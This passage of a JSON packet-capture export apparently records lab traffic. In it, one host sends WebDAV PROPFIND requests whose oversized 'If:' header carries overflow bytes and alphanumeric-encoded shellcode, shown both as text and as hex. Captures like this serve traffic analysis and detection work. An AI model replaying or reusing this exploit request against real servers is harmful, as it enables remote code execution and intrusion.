"http.request.line": "If: <http://192.168.68.1:80/PulkAUpKlNayruCjmOqSPJfXVbFrMTPaLZHPMSxRQMmHEYmHAiMOrAisXxCLtmgLu<4C><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/UWTaniBICkarwZstzpSUdroRCiDCRCEqUbePmKEnlrXWDokOQQcfaLOCqSCPtDHpc<70><63><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "588"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.906590000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.906590000",
|
||
"frame.time_delta": "0.000081000",
|
||
"frame.time_delta_displayed": "0.003277000",
|
||
"frame.time_relative": "17.157530000",
|
||
"frame.number": "596",
|
||
"frame.len": "257",
|
||
"frame.cap_len": "257",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "243",
|
||
"ip.id": "0x000068e9",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000c7b4",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "43669",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "43669",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "82",
|
||
"tcp.len": "191",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "1819099201",
|
||
"tcp.nxtseq": "1640",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2051341861",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00007521",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:aa:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:aa:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868714",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000224000",
|
||
"tcp.analysis.bytes_in_flight": "1639",
|
||
"tcp.analysis.push_bytes_sent": "1639"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000634000",
|
||
"tcp.time_delta": "0.000081000"
|
||
},
|
||
"tcp.payload": "67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "595",
|
||
"tcp.segment": "596",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1639",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:68:4c:63:52:75:68:4b:71:4e:4d:67:67:6d:59:46:47:42:72:71:74:49:6a:7a:54:57:74:44:79:4e:63:71:51:6d:42:63:66:66:76:55:43:72:69:46:45:6f:7a:72:50:58:49:72:50:6d:69:6a:7a:44:56:67:63:6c:47:43:69:e6:b5:94:e5:a5:96:e5:9d:b7:e6:8d:88:e6:b9:b6:e6:9d:ba:e7:91:ad:e4:99:97:e4:a9:88:e4:bd:94:e7:89:ae:e4:a5:8e:e5:8d:8f:e6:b5:a5:e6:85:8e:e7:99:b2:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:91:85:e6:a1:83:e5:a5:8f:e7:99:89:e7:a9:86:e5:9d:a4:e7:81:a3:e4:b1:ab:e6:b9:8c:e6:9d:8f:e6:99:ae:e4:b9:ba:e6:b5:b2:e6:85:ab:e4:b1:a2:e6:a1:b4:e7:81:94:e5:9d:90:e6:99:86:e7:a9:8d:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:53:58:4a:49:71:59:5a:77:65:70:71:55:75:58:54:56:55:67:4d:58:78:62:77:64:72:43:4d:51:48:47:72:54:51:50:64:6f:4c:57:47:67:6a:43:74:4b:72:6f:68:56:48:61:52:77:6d:6a:66:65:41:43:55:69:79:4d:71:73:e4:9d:8b:e6:99:86:e4:b9:8a:e5:91:b9:e5:85:b9:e6:b5:b9:e5:a9:90:e6:bd:8c:e6:b1:8d:e5:a1:a4:e7:9d:99:e4:9d:b0:e6:85:88:e7:a1:ad:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:99:ab:e4:8d:a5:e4:b9:a7:e6:ad:8c:e1:8f:80:e6:a0:83:e4:95:81:e6:99:85:e5:85:b5:e4:99:98:e6:ad:af:e4:85:a8:e5:a9:a4:e6:91:82:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/hLcRuhKqNMggmYFGBrqtIjzTWtDyNcqQmBcffvUCriFEozrPXIrPmijzDVgclGCi<43><69><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/SXJIqYZwepqUuXTVUgMXxbwdrCMQHGrTQPdoLWGgjCtKrohVHaRwmjfeACUiyMqs<71><73><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAG